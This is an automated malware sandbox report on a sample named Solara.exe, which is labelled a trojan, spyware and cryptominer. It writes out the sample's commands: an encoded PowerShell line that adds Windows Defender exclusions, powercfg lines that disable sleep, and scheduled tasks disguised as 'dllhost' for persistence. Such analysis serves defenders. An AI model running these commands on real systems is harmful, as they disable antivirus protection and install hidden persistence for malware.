Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008D41D0	2_2_008D41D0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008DD1E0	2_2_008DD1E0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00900110	2_2_00900110
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00924110	2_2_00924110
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008EE900	2_2_008EE900
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0093D90A	2_2_0093D90A
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00908130	2_2_00908130
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00926920	2_2_00926920
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E6940	2_2_008E6940
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E9150	2_2_008E9150
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00907170	2_2_00907170
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008DB960	2_2_008DB960
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F3A90	2_2_008F3A90
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F5290	2_2_008F5290
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_009312B0	2_2_009312B0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00937AB0	2_2_00937AB0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E7AA0	2_2_008E7AA0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00908AA0	2_2_00908AA0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E82B0	2_2_008E82B0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_009422CA	2_2_009422CA
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_009022F0	2_2_009022F0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00932210	2_2_00932210
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F3200	2_2_008F3200
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00921A00	2_2_00921A00
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00948230	2_2_00948230
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00933A20	2_2_00933A20
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00903A50	2_2_00903A50
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008D7240	2_2_008D7240
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00918A70	2_2_00918A70
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008EDB80	2_2_008EDB80
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E0B90	2_2_008E0B90
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00927BB0	2_2_00927BB0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E1BA0	2_2_008E1BA0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008EE3A0	2_2_008EE3A0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_009053A0	2_2_009053A0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_009193D0	2_2_009193D0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_009393E0	2_2_009393E0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008FABF0	2_2_008FABF0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008DA300	2_2_008DA300
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008D7B00	2_2_008D7B00
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008D8310	2_2_008D8310
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008EB310	2_2_008EB310
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F7320	2_2_008F7320
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00911320	2_2_00911320
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0091A350	2_2_0091A350
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00920350	2_2_00920350
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0091EB40	2_2_0091EB40
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E7B50	2_2_008E7B50
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F9360	2_2_008F9360
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00914CB0	2_2_00914CB0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0092BCC0	2_2_0092BCC0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_009284C0	2_2_009284C0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0093A4C0	2_2_0093A4C0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008D54D0	2_2_008D54D0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00903410	2_2_00903410
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F2C00	2_2_008F2C00
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00931C00	2_2_00931C00
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E4C10	2_2_008E4C10
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008ED410	2_2_008ED410
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00923430	2_2_00923430
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E4430	2_2_008E4430
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E0430	2_2_008E0430
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E2450	2_2_008E2450
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F5450	2_2_008F5450
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00903C70	2_2_00903C70
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00916460	2_2_00916460
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008EEC70	2_2_008EEC70
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00955592	2_2_00955592
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F2D80	2_2_008F2D80
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0090C5A0	2_2_0090C5A0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0090F5D0	2_2_0090F5D0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00907DD0	2_2_00907DD0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F55C0	2_2_008F55C0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008D8DD0	2_2_008D8DD0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00917DF0	2_2_00917DF0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E0DE0	2_2_008E0DE0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F9D00	2_2_008F9D00
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0092FD00	2_2_0092FD00
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00929500	2_2_00929500
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E3510	2_2_008E3510
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0090FD20	2_2_0090FD20
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008D9D30	2_2_008D9D30
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E6530	2_2_008E6530
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F3530	2_2_008F3530
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008DCD50	2_2_008DCD50
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0090B560	2_2_0090B560
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00933D60	2_2_00933D60
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00925690	2_2_00925690
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00912E80	2_2_00912E80
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008D9690	2_2_008D9690
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008DE690	2_2_008DE690
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00913EA0	2_2_00913EA0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008D16B0	2_2_008D16B0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F5EB0	2_2_008F5EB0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E76C0	2_2_008E76C0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0090AEC0	2_2_0090AEC0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0090D6E0	2_2_0090D6E0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_009086E0	2_2_009086E0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0091AEE0	2_2_0091AEE0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008DB6F0	2_2_008DB6F0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F66F0	2_2_008F66F0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00937E10	2_2_00937E10
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008DC610	2_2_008DC610
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F0E10	2_2_008F0E10
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E0620	2_2_008E0620
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008FFE20	2_2_008FFE20
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00919650	2_2_00919650
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00934640	2_2_00934640
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008DDE60	2_2_008DDE60
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00939E60	2_2_00939E60
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00916F90	2_2_00916F90
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0092FF90	2_2_0092FF90
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F6FC0	2_2_008F6FC0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00922FC0	2_2_00922FC0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_009207F0	2_2_009207F0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008D27E0	2_2_008D27E0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00953718	2_2_00953718
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008DBF10	2_2_008DBF10
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F2F10	2_2_008F2F10
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E3F20	2_2_008E3F20
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008E9740	2_2_008E9740
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008F1F50	2_2_008F1F50
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Code function: 8_2_0155F2E4	8_2_0155F2E4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_0513B570	11_2_0513B570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_0513B550	11_2_0513B550
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_08E53E98	11_2_08E53E98

Source: Joe Sandbox View

Dropped File: C:\ProgramData\Dllhost\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: String function: 0041ACC0 appears 85 times
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: String function: 0094607C appears 44 times
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: String function: 0094AE24 appears 34 times
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: String function: 0040B1D0 appears 47 times
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: String function: 0093DE10 appears 96 times

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 400

Source: winlogson.exe.8.dr

Static PE information: Number of sections : 11 > 10

Source: winlogson.exe.8.dr

Static PE information: No import functions for PE file found

Source: winlogson.exe.8.dr

Static PE information: Data appended to the last section found

Source: Solara.exe.bin.exe, 00000002.00000003.1636690920.0000000001266000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTask32Main.exe@ vs Solara.exe.bin.exe
Source: Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTask32Main.exe@ vs Solara.exe.bin.exe

Source: Solara.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Solara.exe.bin.exe	Static PE information: Section: .bss ZLIB complexity 1.0003259892086331
Source: Solara.exe.bin.exe	Static PE information: Section: .bss ZLIB complexity 1.0003259892086331

Source: WinRing0x64.sys.8.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@26/21@2/4

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Code function: 2_2_00442800 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_00442800

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1764:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Mutant created: \Sessions\1\BaseNamedObjects\ProgramV3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6856
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

File created: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe

Jump to behavior

Source: Solara.exe.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Solara.exe.bin.exe, 00000002.00000003.932677884.0000000001263000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.945284581.0000000001285000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.945076012.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.932274143.00000000035F5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Solara.exe.bin.exe	Virustotal: Detection: 76%
Source: Solara.exe.bin.exe	ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

File read: C:\Users\user\Desktop\Solara.exe.bin.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Solara.exe.bin.exe "C:\Users\user\Desktop\Solara.exe.bin.exe"
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Process created: C:\Users\user\Desktop\Solara.exe.bin.exe "C:\Users\user\Desktop\Solara.exe.bin.exe"
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 400
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe "C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe"
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Process created: C:\Users\user\Desktop\Solara.exe.bin.exe "C:\Users\user\Desktop\Solara.exe.bin.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe "C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA="	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
